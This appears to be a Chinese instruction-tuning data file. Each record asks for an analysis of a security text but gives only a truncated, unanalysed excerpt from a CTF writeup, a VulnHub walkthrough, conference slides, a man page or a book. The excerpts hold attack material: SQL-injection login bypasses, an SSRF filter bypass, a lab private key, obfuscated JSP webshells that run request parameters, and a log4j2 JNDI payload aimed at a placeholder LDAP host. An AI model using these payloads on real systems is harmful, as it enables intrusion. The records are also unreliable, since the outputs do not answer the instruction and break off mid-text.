{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBCTF2017-Writeup By Nu1L Misc 签到 Nc 连上去输入 token得到 flag foolme 关键点 1哈希碰撞得到 md5 值结尾相同的 key.使用穷举方法即可 关键点 2发送满足条件的 jpg 图片的数据校验函数是 check 直接修改可以影响 diff 值的数据即可即 input_x,input_y,input_z 的值不断修改像素值将 diff 值调高但是不可以大于 2并且被识别引擎识别为与原图不同的图片 Web: signature Github 搜索源码很容易搜到源码下载后进行分析 很容易看出是 CI 写的一个 Demo 站点 在 blog_backup_2014.php 中很容易发现 成功登陆后在 admin 页面处发现注入 发现经过了 waf 处理...但是出题人给的源码里把 waf 函数已经抽空黑盒 fuzz 后发现貌似只 过滤了空格用括号绕过即可注入得到最终的表结构然后发现 flag 在 payment.php 中 读取数据然后构造 signaturepost 得到最终 flag(忘记截图... PS题目注入的时候服务器反应的确有点慢不如将数据库的结构在源码中有所体现可能 会增加选手的做题快感 XD baby sqli 首先输入 admin'#绕过登陆提示有 4 个 item一个一个的买买到 d 拿到 flag bctf{8572160a2bc7743ad02b539f74c24917} Kitty shop 题目接着刚才的做有一个可以下载 manual 的地方fuzz 发现存在任意文件下载 Fuzz 目录 得到一个地址/app/encrypt0p@ssword/passwor 访问 http://baby.bctf.xctf.org.cn/encrypt0p@ssword/password 利用 kaiity 的任意文件下载拿到 client 的 elf 文件如图 sub_401B6A 函数中调用了 recv 函数 接受服务器数据 对 recv 函数下断分析接收的数据得到如下图所示的内容 Paint 涉及两个知识点一个 curl 的拼接访问一个是 127.0.0.1 呗过滤之后的绕过curl 可以拼 接访问curl http://a.com/{a.gif,b.gif},还有就是 127.0.0.1 被过滤之后的绕过可以用 127.0.0.2 绕过我们首先将一张图片切成 2 分中间差距正好应该是 flag.php 的请求大小首先在地 址那里输入 http://127.0.0.2/flag.php 获知大小是 374 字节之后用我们的脚本切割图片上 传 之后在地址那里输入 http://127.0.0.2/{uploads/1492269999HkwuqBYX.gif,flag.php,uploads/1492270040evG9tmYw.gif} 得到新的图片 访问就是 flag > 后来我发现其实只要切割大小小于 374 都可以拿到 flag原因不详 file1 = open('a.gif', 'r') data = file1.read() i1 = data[:200] i2 = data[573:] f1 = open(\"1.gif\", \"w\") f1.write(i1) f1.close() f2 = open(\"2.gif\", \"w\") f2.write(i2) f2.close() Only admin 首先是登陆忘记密码那里输入用户名 admin 和随便一个邮箱查看源码有一个 md5 解开就是 admin 的密码登陆发现存在 cookie解开是 user 的 md5修改成 admin 的 md5 拿到一个 github 的用户访问上去有一个 apk反编译一下解密就好有点扯淡的题目 不解释 import java.util.Base64; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; public class MyTest { public static void main(String[] args) throws Exception { SecretKeySpec key = new SecretKeySpec(\"3742#AES$$JKL:cn\".getBytes(), \"AES\"); Cipher v0 = Cipher.getInstance(\"AES/ECB/PKCS5Padding\"); v0.init(2, key); byte[] b = null; b = Base64.getDecoder().decode(\"+ipteaf41bn/76A25zWVD", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRICHARD THIEME THIEMEWORKS WWW.THIEMEWORKS.COM rthieme@thiemeworks.com neuralcowboy@gmail.com PO Box 170737 Milwaukee WI 53217-8061 THE ONLY WAY TO TELL THE TRUTH IS THROUGH FICTION THE DYNAMICS OF LIFE IN THE NATIONAL SECURITY STATE \" It's no wonder how complicated things get, what with one thing leading to another.\" ... E. B. White http://www.thiemeworks.com/zero-day-roswell/  http://www.washingtonsblog.com/2014/01/american-british-spy-agencies-intentionally-weakened-security-many-decades.html?utm_content=bufferd7637&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer  \"When democracy relies on entertainment to provide knowledge of its secret affairs, the contradictions of empire are \"normalized to invisibility\" thru a blurring of fictional and real operations.\" - Timothy Melley, The Covert Sphere Project Blue Book The USAF creates Project Blue Book in 1952. Dr. J. Allen Hynek, Northwestern University astronomer, is retained as a resource scientist. The CIA gets involved and concludes a study: - Flying saucers are not a threat to national security but reports of flying saucers are. - Military personnel should be trained in proper observation of flying saucers. - Programs should be created to debunk flying saucers to the citizenry. Fast forward to Hynek when he created CUFOS in 1973 (The Center for UFO Studies) as an independent organization because he became disillusioned with the USAF: \"The public was, in fact, placed in the role of 'the enemy,' against whom 'counterespionage' tactics must be employed. From my personal experience, I frequently felt that those in charge did consider people who reported UFOs or who took a serious interest in them and wanted information about them, as enemies.\" (UFOs and Government: A Historical Inquiry, p. 243) Selected Bibliography Selected Bibliography Mind Games by Richard Thieme (Duncan Long Publishing: 2010) UFOs and Government: A Historical Inquiry by Michael Swords, Robert Powell, others including Richard Thieme (An", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 information_schema 这个表(视图)是在MySQL5以后的才有的,现在MySQL4应该是很少了,所以都围绕着MySQL5来讲解information_schema是用于存储数据库元数据的表它保存了数据库名表名列名等信息让我们从爆破表名到了可以直接查询 ``` mysql> show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | OPTIMIZER_TRACE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_LOCKS | | INNODB_TRX | | INNODB_SYS_DATAFILES | | INNODB_LOCK_WAITS | | INNODB_SYS_TABLESTATS | | INNODB_CMP | | INNODB_METRICS | | INNODB_CMP_RESET | | INNODB_CMP_PER_INDEX | | INNODB_CMPMEM_RESET | | INNODB_FT_DELETED | | INNODB_BUFFER_PAGE_LRU | | INNODB_SYS_FOREIGN | | INNODB_SYS_COLUMNS | | INNODB_SYS_INDEXES | | INNODB_FT_DEFAULT_STOPWORD | | INNODB_SYS_FIELDS | | INNODB_CMP_PER_INDEX_RESET | | INNODB_BUFFER_PAGE | | INNODB_CMPMEM | | INNODB_FT_INDEX_TABLE | | INNODB_FT_BEING_DELETED | | INNODB_SYS_TABLESPACES | | INNODB_FT_INDEX_CACHE | | INNODB_SYS_FOREIGN_COLS | | INNODB_SYS_TABLES | | INNODB_BUFFER_POOL_STATS | | INNODB_FT_CONFIG | +---------------------------------------+ 59 rows in set (0.00 sec) ``` 我们经常用到的几个表 1. SCHEMATA表  提供了当前mysql实例中所有数据库的信息 2. TABLES 表  提供了关于数据库中的表的信息 3. COLUMNS 表 提供了表中的列信息 SCHEMATA: ``` mysql> select * from information_schema.schemata; +--------------+--------------------+----------------------------+------------------------+----------+ | CATALOG_NAME | SCHEMA_NAME | DEFAULT_CHARACTER_SET_NAME | DEFAULT_COLLATION_NAME | SQL_PATH | +--------------+--------------------+----------------------------+--------------------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Infosec Prep OSCP Box > https://download.vulnhub.com/infosecprep/oscp.zip 靶场IP ![image-20220720104840709](../../.gitbook/assets/image-20220720104840709.png) 扫描对外端口 ``` (rootkali)-[/tmp] # nmap -p 1-65535 192.168.32.177 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 22:48 EDT Nmap scan report for 192.168.32.177 Host is up (0.00071s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 33060/tcp open mysqlx MAC Address: 00:0C:29:B6:A2:40 (VMware) Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds ``` 浏览器访问80端口 ![image-20220720104945504](../../.gitbook/assets/image-20220720104945504.png) 扫描目录找到`robots.txt` ![image-20220720105139282](../../.gitbook/assets/image-20220720105139282.png) ![image-20220720105203058](../../.gitbook/assets/image-20220720105203058.png) 找到一串base64加密字符串 ![image-20220720105232306](../../.gitbook/assets/image-20220720105232306.png) 解密是私钥文件 ``` (rootkali)-[/tmp] # curl http://192.168.32.177/secret.txt | base64 -d % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 3502 100 3502 0 0 2554k 0 --:--:-- --:--:-- --:--:-- 3419k -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAtHCsSzHtUF8K8tiOqECQYLrKKrCRsbvq6iIG7R9g0WPv9w+gkUWe IzBScvglLE9flolsKdxfMQQbMVGqSADnYBTavaigQekue0bLsYk/rZ5FhOURZLTvdlJWxz bIeyC5a5F0Dl9UYmzChe43z0Do0iQw178GJUQaqscLmEatqIiT/2FkF+AveW3hqPfbrw9v A9QAIUA3ledqr8XEzY//Lq0+sQg/pUu0KPkY18i6vnfiYHGkyW1SgryPh5x9BGTk3eRYcN w6mDbAjXKKCHGM+dnnGNgvAkqT+gZWz/Mpy0ekauk6NP7NCzORNrIXAYFa1rWzaEtypHwY kCEcfWJJlZ7+fcEFa5B7gEwt/aKdFRXPQwinFliQMYMmau8PZbPiBIrxtIYXy3MHcKBIsJ 0HSKv+HbKW9kpTL5OoAkB8fHF30ujVOb6YTuc1sJKWRHIZY3qe08I2RXeExFFYu9oLug0d tHYdJHFL7cWiNv4mRyJ9RcrhVL1V3CazNZKKwraRAAAFgH9JQL1/SUC9AAAAB3NzaC1yc2 EAAAGBALRwrEsx7VBfCvLYjqhAkGC6yiqwkbG76uoiBu0fYNFj7/cPoJFFniMwUnL4JSxP X5aJbCncXzEEGzFRqkgA52AU2r2ooEHpLntGy7GJP62eRYTlEWS073ZSVsc2yHsguWuRdA 5fVGJswoX", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCisco Catalyst Exploitation Artem Kondratenko Whoami -Penetration tester @ Kaspersky Lab -Hacker -OSC(P|E) -Skydiver ;) Cisco advisory Cisco advisory  The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors:  The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and  The incorrect processing of malformed CMP-specific Telnet options. Cisco advisory . Vault 7: Hacking Tools Revealed Hacking techniques and potential exploit descriptions for multiple vendors:  Microsoft  Apple  Cisco Cisco switch exploit Codename: ROCEM Vault 7: CIA Hacking Tools Revealed Rocem: Modes of Interaction  Set  Unset  Interactive Mode Easy enough  Take two switches  Cluster dem switches!  Look for a magic whatever there is in the traffic  ???  Profit!! Clustering Cisco switches Controlling Slave-switches from Master $ telnet 192.168.88.10 catalyst1#rcommand 1 catalyst2#show priv Current privilege level is 15 Clustering Catalyst switches For real? Clustering Cisco switches: L2 telnet Magic telnet option Telnet Debug log from Vault ROCEM testing notes Telnet commands and options All Hope Is Lost Replaying CISCO_KITS option during generic telnet session doesnt work And also... Cisco IPS rule for this vuln is called Cisco IOS CMP Buffer Overflow Peeking at firmware The firmware is available at the flash partition of the switch: catalyst2#dir flash: Directory of flash:/ 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122- 55.SE1.bin 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text 4 -rwx 3096 Mar 1 1993 00:09:27 +00:00 multiple-fs Peeking at firmware $ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin DECIMAL HEXADECIMAL DESCRIPTION --------------------------------------------------------------- --------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n刘镇东yzddMr6阿里云安全工程师 ØAntSword开发组核心成员开源工具As-ExploitsWebCrackwebshell-venom作者 Ø目前主要从事Webshell攻防研究以及阿里云恶意文本检测引擎的建设 ØGithub: yzddMr6 ØBlog: yzddmr6.com ØCTF: L3H_Sec  Webshell通常是打开权限大门的第一块破门砖  Java Webshell在攻防演练中占据着重要的地位  随着各类防护设备不断升级如何逃避检测成为攻击者最关心的问题 l Tomcat解析篇 l 危险类篇 l 流量对抗篇 令人头疼的编码 Tomcat解析篇  Jsp中可以Unicode或者变形Unicode(\\uuuuuuxxxx)这种格式来对恶意代码进混淆  如果Webshell检测引擎没有对其进行正确的解码处理就会被直接降维打击产生绕过  这种简单通用的混淆方式已经被攻击者广泛使用大部分安全设备也已经支持检测 <% Runtime.getRuntim\\u0065().\\uuuuu0065xec(request.getParameter(\"cmd\")); %> <% \\uuuuuuuuu0052\\uuuuuuuuuuuuu0075\\uuuu006e\\uu0074\\u0069\\u006d\\u0065\\u002e\\u0067 \\u0065\\u0074\\u0052\\u0075\\u006e\\u0074\\u0069\\u006d\\u0065\\u0028\\u0029\\u002e\\u0065 \\u0078\\u0065\\u0063\\u0028\\u0072\\u0065\\u0071\\uuuuuuu0075\\u0065\\u0073\\u0074\\uuuuu 002e\\u0067\\u0065\\u0074\\u0050\\u0061\\uuuu0072\\u0061\\u006d\\u0065\\u0074\\u0065\\u007 2\\u0028\\u0022\\u0063\\u006d\\u0064\\uu0022\\u0029\\u0029\\u003b %> Q为什么支持Unicode的写法 AJavac/ecj在底层解析字符的时候支持Unicode编码 Q为什么支持\\uuuuu这种格式 A解析过程中只要\\的下一个字符是u 编译器就会一直继续循环读取下一个字符 do { bp++; //读取下一个字符 ch = buf[bp]; } while (ch == u);//只要\\的下一个字符是u就会一直继续循环  Javaccom.sun.tools.javac.parser.UnicodeReader#convertUnicode  ecjorg.eclipse.jdt.internal.compiler.parser.Scanner#getNextUnicodeChar 这种简单有效的通杀混淆方式让我们着迷同时也引起我们的思考 是否还存在其他的降维打击方式  Tomcat内部支持了很多小众的字符集编码  如果检测引擎不支持这些字符集对其而言就是一堆无法识别的乱码  用这些特殊的字符集来构造Webshell就可以实现降维打击 Tomcat对于编码的解析过程 org.apache.jasper.compiler.ParserController#doParse (开始页面解析) org.apache.jasper.compiler.ParserController #determineSyntaxAndEncoding (分析文件编码) org.apache.jasper.compiler.EncodingDetector (Jspx: 通过BOM头判断编码) org.apache.jasper.compiler.ParserController #getPageEncodingForJspSyntax (Jsp 从声明中提取编码类型) UTF-8 (默认值) ISO-8859-1 (默认值) Encoding b0 b1 b2 b3 UTF-16LE 0xFF 0xFE * * UTF-16LE 0x3C 0x00 0x3F 0x00 UTF-16BE 0xFE 0xFF * * UTF-16BE 0x00 0x3C 0x00 0x3F ISO-10646- UCS-4 0x00 0x00 0x00 0x3C ISO-10646- UCS-4 0x3C 0x00 0x00 0x00 ISO-10646- UCS-4 0x00 0x00 0x3C 0x00 ISO-10646- UCS-4 0x00 0x3C 0x00 0x00 CP037 0x4C 0x6F 0xA7 0x94 编码前 <jsp:root xmlns:jsp=\"http://java.sun.c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyber Who Done It?! Attribution Analysis Through Arrest History Jake%Kouns,%CISO jake@riskbasedsecurity.com @jkouns August&2016 Lee%Johnstone Security%Researcher @83leej N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Cyber?%Drink! N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Looking%Back%At%The%Last%Five%Years Source:%CyberRiskAnalytics.com N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber 2015% Threat%Vector Source:%CyberRiskAnalytics.com N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber 2015%W Breach%Types Source:%CyberRiskAnalytics.com N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber 2015%Analysis% Country%By%Records Source:%CyberRiskAnalytics.com N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber 2016%Year%To%Date N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Attribution Who is behind all of these data breaches? Attribution What%Does%This%Really%Mean? N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Attribution What is Attribution?  In social psychology, attribution is the process by which individuals explain the causes of behavior and events.  Attribution in copyright law, is acknowledgement as credit to the copyright holder of a work.  The attribution of information to its Source (journalism) Source:%Wikipedia N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Cyber%Attribution N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Cyber%Attribution N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Cyber%Attribution N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E%C%U%R%I%T%Y% cyber Why%Do%People%Care%About%Attribution? N%O%T%%%J%U%S%T%%%S%E%C%U%R%I%T%Y%%,%%%%T%H%E%%%R%I%G%H%T%%%S%E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\"Generated by db2man.xsl. Don't modify this, modify the source. .de Sh \\\" Subsection .br .if t .Sp .ne 5 .PP \\fB\\\\$1\\fR .PP .. .de Sp \\\" Vertical space (when we can't use .PP) .if t .sp .5v .if n .sp .. .de Ip \\\" List item .br .ie \\\\n(.$>=3 .ne \\\\$3 .el .ne 3 .IP \"\\\\$1\" \\\\$2 .. .TH \"SMBD\" 8 \"\" \"\" \"\" .SH NAME smbd \\- 向客户提供SMB/CIFS服务的服务器 .SH \"总览 SYNOPSIS\" \\fBsmbd\\fR [-D] [-F] [-S] [-i] [-h] [-V] [-b] [-d <debug level>] [-l <log directory>][-p <port number>] [-O <socket option>] [-s <configuration file>] .SH \"描述 DESCRIPTION\" .PP 此程序是\\fBSamba\\fR(7) 套件的一部分 .PP \\fBsmbd\\fR 是向Windows客户机提供文件共享和打印服务的服务器进程该服务器用SMB(或CIFS)协议向客户提供文件存放空间和打印服务它与LanManager协议兼容并能向使用此协议的客户提供服务这些客户端包括MSCLIENT 3.0 for DOSWindows for WorkgroupsWindows 95/98/MEWindows NTWindows 2000, OS/2DAVE for Macintosh, 和smbfs for Linux .PP 用来控制服务属性的配置文件的手册页中对服务器可提供的服务进行了详细的描述(参见 \\fBsmb.conf\\fR (5))此手册不描述提供的服务但集中讲述了对管理服务器运行等方面的问题描述 .PP 请注意对服务器运行有关的非常重要的安全性问题同时在进行安装处理前也应该仔细阅读\\fBsmb.conf\\fR (5)手册 .PP 只要有客户请求就会建立一个对话对每个对话每个客户获得服务器的一份复本在对话期间此复本对所有客户产生的连接进行服务当来自此客户的所有连接都关闭时此客户的服务器复本也退出 .PP 服务器所包含的配置文件和其它任何文件都会在每次更改后自动重新装入你可以通过对服务器发送一个SIGHUP信息来强制一次重新装入重新装入配置文件对已建立的任何对服务的连接均无效要么用户必须断开服务要么将\\fBsmbd\\fR进程中止并重启 .SH \"选项 OPTIONS\" .TP -D 如果指定此选项则服务器以后台进程方式运行即它会分离本身并在后台运行在适当的端口上监听请求对于提供比临时性的文件和打印服务更多内容的服务器推荐将\\fBsmbd\\fR 以后台进程方式运行如果在shell命令行运行\\fBsmbd \\fR将默认使用这个选项 .TP -F If specified, this parameter causes the main \\fBsmbd\\fR process to not daemonize, i\\&.e\\&. double-fork and disassociate with the terminal\\&. Child processes are still created as normal to service each connection request, but the main process does not exit\\&. This operation mode is suitable for running \\fBsmbd\\fR under process supervisors such as \\fBsupervise\\fR and \\fBsvscan\\fR from Daniel J\\&. Bernstein's \\fBdaemontools\\fR package, or the AIX process monitor\\&. .TP -S If specified, this parameter causes \\fBsmbd\\fR to log to standard output rather than a file\\&. .TP -i If this parameter is specified it causes the server to run \"interactively\", not as a daemon, even if", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSo you think you want to be a pen-tester. Anch - @boneheadsanon  anch@subba.net Introductions  Penetration Tester  10 years  Red Team Lead  5 years  Im here to help.  Contact Info: Twitter: @boneheadsanon E-Mail: anch@subba.net  The Leprecaun? The Wonderful World of Penetration Testing Misconceptions and Realities Everyone Has One Red Team, Blue Team, Purple Team, Yellow Team?? Just dont wear the brown pants.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMastering AWS Security Create and maintain a secure cloud ecosystem Albert Anthony BIRMINGHAM - MUMBAI Mastering AWS Security Copyright  2017 Packt Publishing All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing, and its dealers and distributors will be held liable for any damages caused or alleged to be caused directly or indirectly by this book. Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information. First published: October 2017 Production reference: 1251017 Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK. ISBN 978-1-78829-372-3 www.packtpub.com Credits Author Albert Anthony Copy Editors Juliana Nair Stuti Srivastava Reviewers Adrin Mukherjee Satyajit Das Project Coordinator Judie Jose Commissioning Editor Vijin Boricha Proofreader Safis Editing Acquisition Editor Heramb Bhavsar Indexer Tejal Daruwale Soni Content Development Editor Devika Battike Graphics Kirk D'Penha Technical Editor Prachi Sawant Production Coordinator Melwyn Dsa About the Author Albert Anthony is a seasoned IT professional with 18 years of experience working with various technologies and in multiple teams spread all across the globe. He believes that the primary purpose of information technology is to solve problems faced by businesses and organizations. He is an AWS certified solutions architect and a corpora", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# TLSSLed软件包描述 TLSSLed是一个Linux shell脚本其目的是评估目标SSL/TLSHTTPSWeb服务器实现的安全性它基于sslscan和openssl s_client命令行工具sslscan是一个使用openssl库全面的SSL/TLS扫描器 目前的测试包括检查目标是否支持SSLv2协议空密码弱密码长度40或56位强密码如AES的可用性数字证书是否MD5签名以及当前的SSL/TLS重协商功能 资料来源http://www.taddong.com/en/lab.html [TLSSLed首页](http://www.taddong.com/en/lab.html) | [Kali TLSSLed资源](http://git.kali.org/gitweb/?p=packages/tlssled.git;a=summary) - 作者Raul SilesTaddong SL - 许可证GPLv3 ## TLSSLed包含的工具 ### tlssled - 评估目标SSL/TLSHTTPS服务器的安全性 ``` root@kali:~# tlssled ------------------------------------------------------ TLSSLed - (1.3) based on sslscan and openssl by Raul Siles (www.taddong.com) ------------------------------------------------------ openssl version: OpenSSL 1.0.1e 11 Feb 2013 sslscan version 1.8.2 ------------------------------------------------------ Date: 20140520-110731 ------------------------------------------------------ [!] 用法: /usr/bin/tlssled <主机名或IP地址> <端口> ``` ## TLSSLed使用示例 检查主机192.168.1.1和端口443上的SSL/TLS ``` root@kali:~# tlssled 192.168.1.1 443 ------------------------------------------------------ TLSSLed - (1.3) based on sslscan and openssl by Raul Siles (www.taddong.com) ------------------------------------------------------ openssl version: OpenSSL 1.0.1e 11 Feb 2013 sslscan version 1.8.2 ------------------------------------------------------ Date: 20140513-165131 ------------------------------------------------------ [*] 分析192.168.1.1:443上的SSL/TLS... [.] 输出目录: TLSSLed_1.3_192.168.1.1_443_20140513-165131 ... [*] 检查目标是否支持SSL/TLS... [.] 目标192.168.1.1:443支持SSL/TLS... [.] 使用的SSL/TLS协议版本: (空意味着正在使用默认的openssl协议版本) [*] 在192.168.1.1:443上运行sslscan... [-] 测试SSLv2 ... [-] 测试空密码... ``` 原文链接[http://tools.kali.org/information-gathering/tlssled](http://tools.kali.org/information-gathering/tlssled)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOne Step Before Game Hackers -- Instrumenting Android Emulators Defcon 26 nevermoe  DeNA Co., Ltd. Self Introduction  nevermoe (@n3v3rm03, i [at] nevermoe.com)  Chinese in Japan  Security engineer in DeNA Co., Ltd.  Love playing / hacking games  DeNA Co., Ltd. Agenda  Background  Emulator Internal  Hooking  Demo  Conclusion  DeNA Co., Ltd. Background: Game Cheating Threat Model Users Cheaters Game Vendors PC YES YES YES Mobile (Normally) No YES No Full Control?  DeNA Co., Ltd. Background: Mobile Game Cheating Business Model  Is there an easy way to distribute cheating tools?  Android emulators!  Unified environment  Already or easily rooted  DeNA Co., Ltd.  Cheating on emulators  Popular: Touch simulation (e.g. Mobile Anjian)  Why are there no hooking tools?  Game codes are usually native  Commercial emulators use Intel Houdini for arm-x86 translation in native code Background: Mobile Game Cheating Business Model Hooking solution is not obvious  DeNA Co., Ltd. Background: Purpose  Enable hooking on commercial Android emulators!  DeNA Co., Ltd. Emulator Internal: Targets Client Ver. Android Ver. Houdini Ver. BlueStacks 3.56.73.1817 4.4.2 4.0.8.45720 NOX 6.0.5.2 4.4.2 4.0.8.45720 NOX 6.0.5.2 5.5.1 5.0.7b_x.48396 LeiDian 2.0.54 5.5.1 5.0.7b_x.48396 MEmu 5.3.1 5.5.1 5.0.7b_x.48396  DeNA Co., Ltd. Emulator Internal: Command Line Binary // file: enable_nativebridge.sh cd $binfmt_misc_dir if [ -e register ]; then echo ':arm_exe:M::\\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\ \\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x28::'\"/system/lib/arm/houdini:P\" > register echo ':arm_dyn:M::\\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\ \\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x28::'\"/system/lib/arm/houdini:P\" > register fi  Hook it  LD_PRELOAD=libinject_arm.so ./target_exe_arm  ptrace(x86) target_pid  ptrace(arm) target_pid  DeNA Co., Ltd. Emulator Internal: Java Application  Is LD_PRELOAD useful in Java application hooking?  DeNA Co., Ltd.  Normal startup Emulator Internal: J", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-log4j2RCE 说明 log4j2 与 log4j 属于不同项目且二者的配置方式也存在差异 log4j 是通过 log4j.properties 来进行配置的而 log4j2 是通过 xml 文件来进行配置的 环境搭建 pom.xml 测试代码 在众多测试代码当中大家都是利用 Logger.error() 来触发漏洞但根据 log4j2 的默认漏洞级别 trace<debug<info<warn<error<fatal  error 和 fatal 两个级别的日志会打印到控制台同 时也会触发漏洞当然还可以通过配置文件获取动态级别两个方式调整 1. 默认缺省配置 <dependencies> <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId><!--用于配置log4j--> <version>1.2.17</version> </dependency> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId><!--用于配置log4j2--> <version>2.13.2</version> </dependency> </dependencies> import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; //包导入包含了log4j不要导错包了 public class log4j2RCE { private static final Logger logger= LogManager.getLogger(log4j2RCE.class); public static void main(String[] args) { logger.debug(\"debug...\"); logger.info(\"info...\"); logger.warn(\"warn...\"); logger.error(\"error....\");//${jndi:ldap://IP:389/alibaba} logger.fatal(\"fatal\"); } } 2. 全日志输出配置 <?xml version=\"1.0\" encoding=\"UTF-8\"?> <Configuration status=\"WARN\"> <Appenders> <Console name=\"Console\" target=\"SYSTEM_OUT\"> <PatternLayout pattern=\"%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n\"/> </Console> </Appenders> <Loggers> <Root level=\"error\"> <AppenderRef ref=\"Console\"/> </Root> </Loggers> </Configuration> <?xml version=\"1.0\" encoding=\"UTF-8\"?> <Configuration> <Appenders> <Console name=\"STDOUT\" target=\"SYSTEM_OUT\"> <PatternLayout pattern=\"%d %-5p [%t] %C{2} (%F:%L) - %m%n\"/> </Console> </Appenders> <Loggers> <Logger name=\"org.apache.log4j.xml\" level=\"All\"/> <Root level=\"debug\"> <AppenderRef ref=\"STDOUT\"/> </Root> </Loggers> </Configuration> 3. 动态级别设置使用默认缺省配置但是利用代码进行动态设置级别 <?xml version=\"1.0\" 